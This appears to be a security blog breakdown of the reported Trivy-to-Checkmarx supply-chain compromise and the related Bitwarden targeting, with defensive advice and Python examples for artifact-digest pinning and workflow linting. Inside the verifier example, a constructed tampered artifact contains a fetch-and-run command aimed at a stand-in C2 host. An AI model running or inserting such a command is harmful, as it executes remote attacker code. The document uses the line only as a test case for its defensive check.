
Understanding the Supply-Chain Attacks on Checkmarx and Bitwarden: A Step-by-Step Breakdown

2026-05-01 17:28:19

Introduction

In recent weeks, two major security firms, Checkmarx and Bitwarden, were caught up in a supply-chain attack. The chain began with the compromise of Trivy, a widely used open-source vulnerability scanner, escalated to a breach of Checkmarx's own GitHub account, and was followed by a ransomware attack on Checkmarx. This guide walks through the sequence of events step by step so that security teams can see how such a chain unfolds and where it can be broken.

Source: feeds.arstechnica.com


Step 1: Attacker Reconnaissance and Target Selection

The attackers first identified Trivy as a high-value target. Trivy, the open-source vulnerability scanner maintained by Aqua Security, is integrated into many CI pipelines and security toolchains, so a single compromised release reaches a broad audience, including security vendors such as Checkmarx and Bitwarden.

Step 2: Initial Compromise of Trivy's GitHub Account

On March 19, the attackers gained control of Trivy's GitHub account. The method of initial access is not stated; phishing, credential stuffing, or weak authentication on a maintainer account are the usual routes. With that access they could push code to the repository and modify published releases.

Step 3: Malware Injection via Trivy Releases

Using that access, the attackers published a malicious Trivy release. Systems that downloaded the compromised version were silently infected with malware that searched for sensitive data such as repository tokens, SSH keys, and other credentials.

Step 4: Data Exfiltration from Infected Systems

On infected machines the malware scanned local files, environment variables, and stored credentials, then exfiltrated what it found to attacker-controlled command-and-control servers. Checkmarx, a Trivy user, was among the victims.

Step 5: Weaponizing Stolen Credentials Against Checkmarx

Four days later, on March 23, the attackers used credentials harvested by the Trivy malware, possibly tokens belonging to Checkmarx employees, to take over Checkmarx's own GitHub account. They then pushed malware directly to Checkmarx's users, turning the security vendor into both a victim and a distribution vector.

Step 6: Containment and Remediation by Checkmarx

Checkmarx detected the breach, replaced the malicious files with legitimate versions, and rotated the compromised credentials. By then some users had already downloaded the malware, so remediation could contain the incident but not undo the exposure.
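The chain in Steps 3 to 6 runs through a single malicious release that consumers installed without checking it against anything they controlled. The following is an added example, not code from the page, from Trivy or Aqua Security, or from Checkmarx: it verifies a downloaded artifact against a SHA-256 digest the consumer recorded out-of-band when the release was first reviewed, and cross-checks the project's published checksums file as well. The artifact names, bytes and checksum lines are constructed, and `PINNED_DIGESTS`, `verify_artifact` and `parse_checksums` are names chosen for this example. The point of the out-of-band pin is the last case in the usage: an attacker with release access can regenerate the checksums file to match a swapped artifact, and a check against that file alone would pass.

```python
"""Verify a downloaded release artifact against a digest recorded out-of-band.

Added example; not code from Trivy, Aqua Security, Checkmarx or the article.
Assumes the consumer stored the artifact's SHA-256 in its own repository at
review time (PINNED_DIGESTS) and that the upstream checksums file uses the
"<hex>  <filename>" line format written by sha256sum. All names, bytes and
checksum lines below are constructed for the demonstration.
"""
import hashlib
import hmac

ARTIFACT_NAME = "scanner_1.0.0_Linux-64bit.tar.gz"  # constructed file name

# Constructed stand-in for the bytes of the legitimate release.
GOOD_ARTIFACT = b"#!/bin/sh\necho 'scanner 1.0.0'\n"
# Constructed stand-in for a swapped release: same file name, extra payload.
TAMPERED_ARTIFACT = GOOD_ARTIFACT + b"curl -s http://c2.invalid/run | sh\n"


def sha256_hex(data):
    """Hex SHA-256 of a byte string."""
    return hashlib.sha256(data).hexdigest()


# In real use this is a literal committed to your own repository when the
# release was reviewed; it is computed here only to keep the example offline.
PINNED_DIGESTS = {ARTIFACT_NAME: sha256_hex(GOOD_ARTIFACT)}


def parse_checksums(text):
    """Parse "<hex>  <name>" lines (and the "<hex> *<name>" binary form) into {name: hex}."""
    table = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue  # blank or malformed line
        digest, name = parts
        table[name.strip().lstrip("*")] = digest.lower()
    return table


def verify_artifact(name, data, checksums_text=None, pinned=PINNED_DIGESTS):
    """Return "ok", or a "refuse: ..." / "warn: ..." string.

    Callers must not unpack or run the artifact on "refuse". The pinned digest
    is authoritative; the upstream checksums file is only a consistency check,
    because anyone who can swap the artifact can usually rewrite that file too.
    """
    expected = pinned.get(name)
    if expected is None:
        return "refuse: no out-of-band pin for " + name
    actual = sha256_hex(data)
    if not hmac.compare_digest(actual, expected):
        return "refuse: digest mismatch, got " + actual[:12] + "..."
    if checksums_text is not None:
        published = parse_checksums(checksums_text).get(name)
        if published != actual:
            return "warn: pinned digest matches but upstream checksums file does not"
    return "ok"


# Checksums file as upstream originally published it (constructed).
PUBLISHED_CHECKSUMS = "%s  %s\n" % (sha256_hex(GOOD_ARTIFACT), ARTIFACT_NAME)
# Checksums file an attacker with release access would publish next to the
# swapped artifact so that a naive "sha256sum -c" still passes (constructed).
REGENERATED_CHECKSUMS = "%s  %s\n" % (sha256_hex(TAMPERED_ARTIFACT), ARTIFACT_NAME)

if __name__ == "__main__":
    # Legitimate release: pin and published file agree -> ok
    print(verify_artifact(ARTIFACT_NAME, GOOD_ARTIFACT, PUBLISHED_CHECKSUMS))
    # Swapped release with a regenerated checksums file: the file agrees, the pin does not -> refuse
    print(verify_artifact(ARTIFACT_NAME, TAMPERED_ARTIFACT, REGENERATED_CHECKSUMS))
    # A release nobody has reviewed yet has no pin -> refuse rather than trust upstream blindly
    print(verify_artifact("scanner_1.0.1_Linux-64bit.tar.gz", GOOD_ARTIFACT))
```

Where the project signs its releases, verify the signature too, but remember that a signing workflow driven from the compromised account can sign whatever the attacker uploads; the digest recorded before the compromise is the one check the attacker cannot satisfy from that account alone.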


Step 7: The Ransomware Wave

Shortly after the supply-chain incidents, Checkmarx was hit by a ransomware attack, reportedly by a different group seeking notoriety. Whether this second attack reused residual access from the earlier breach or exploited other weaknesses exposed by it is not established; either way, an organization in the middle of incident response is an attractive target for opportunists.

Step 8: Impact on Bitwarden and Other Firms

The original article focuses on Checkmarx, but Bitwarden, another security company, was also singled out by the attackers. How Bitwarden was targeted is not detailed; it may have been through the Trivy malware or a separate compromise. The pattern is the same either way: attack security vendors, whose tools run with privileged access inside many organizations, to amplify reach.

Tips for Defending Against Supply-Chain Attacks

By understanding each step of the Checkmarx and Bitwarden attack chain, security teams can see where it could have been broken. The key takeaway: attackers increasingly target security tools because those tools run with privileged access inside many organizations, so protect your supply chain like the crown jewels. In practice that means the following.

Pin every scanner, build tool and CI action to an exact version by commit SHA or artifact digest recorded in your own repository, and verify a downloaded release against that record (and against its signature, where the project signs releases) before running it. Pulling the newest release automatically at build time is how one malicious release, as in Step 3, spreads to many pipelines.

Keep long-lived credentials off build hosts. Prefer short-lived, narrowly scoped tokens (for example OIDC-issued cloud credentials and read-only workflow tokens) so that a scanner running as malware, as in Step 4, finds little worth stealing.

Treat maintainer and release accounts as the most sensitive accounts you have: phishing-resistant MFA, branch protection, and a second reviewer or a separate signing step for releases, so that one stolen token, as in Step 5, cannot push a release on its own.

Alert on unexpected tag, release or workflow changes and on credential use from new locations, and keep a rotation plan ready; the containment in Step 6 depended on both.

Run untrusted or newly updated tools in ephemeral, isolated environments with no path to production secrets, and assume that a compromise may be followed by a second, opportunistic one, as the ransomware wave in Step 7 showed.
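Two of the controls that limit the blast radius of a compromised upstream action, pinning each third-party action to a full commit SHA rather than a movable tag or branch, and keeping the workflow token read-only by default, can be checked mechanically. The following linter is an added example and not code from the page or from any vendor it names; the two workflow texts are constructed, the 40-character pin is a placeholder rather than a real commit, and `check_workflow` is a name chosen here. It goes slightly beyond the text by also flagging `permissions: write-all` and a missing workflow-level `permissions:` block.

```python
"""Lint a GitHub Actions workflow for unpinned actions and over-broad tokens.

Added example; not code from the article or from any project it names.
Assumes the workflow text is ordinary YAML as GitHub reads it; it is scanned
line by line, which is enough for the "uses:" and "permissions:" keys.
Both sample workflows are constructed, and the 40-hex pin is a placeholder,
not a real commit in any repository.
"""
import re

FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*(\S+)")


def check_workflow(text):
    """Return [(line_number, kind, detail), ...]; an empty list means clean.

    kinds: "mutable-ref"    third-party action pinned to a tag, branch or nothing
           "broad-token"    permissions: write-all
           "no-permissions" no workflow-level permissions: block (reported as line 0)
    """
    findings = []
    has_top_level_permissions = False
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("permissions:"):  # unindented, so workflow-level
            has_top_level_permissions = True
        if re.search(r"permissions:\s*write-all\b", line):
            findings.append((lineno, "broad-token", line.strip()))
        m = USES_LINE.match(line)
        if not m:
            continue
        ref = m.group(1)
        # Local actions and container images are not git refs; images should be
        # pinned by image digest, which is a separate check.
        if ref.startswith("./") or ref.startswith("docker://"):
            continue
        action, _, rev = ref.rpartition("@")
        if not action or not FULL_SHA.match(rev):
            findings.append((lineno, "mutable-ref", ref))
    if not has_top_level_permissions:
        findings.append((0, "no-permissions",
                         "no workflow-level permissions: block; GITHUB_TOKEN gets the repository default"))
    return findings


# Constructed: how many scan workflows look. Tags and branches move, so a
# compromised upstream can change what these lines run without any change here.
WEAK_WORKFLOW = """\
name: scan
on: [push]
permissions: write-all
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: aquasecurity/trivy-action@master
        with:
          scan-type: fs
"""

# Constructed: the same workflow with every action pinned to a reviewed commit
# (placeholder SHA) and the token limited to reading repository contents.
HARDENED_WORKFLOW = """\
name: scan
on: [push]
permissions:
  contents: read
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567  # placeholder pin
      - uses: aquasecurity/trivy-action@0123456789abcdef0123456789abcdef01234567  # placeholder pin
        with:
          scan-type: fs
"""

if __name__ == "__main__":
    for label, wf in (("weak", WEAK_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(label, check_workflow(wf) or "clean")
```

Pinning to a commit only helps if someone actually reviews the commit being pinned and keeps the pin updated; a tool such as Dependabot can raise the update pull requests, but the review is the control.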
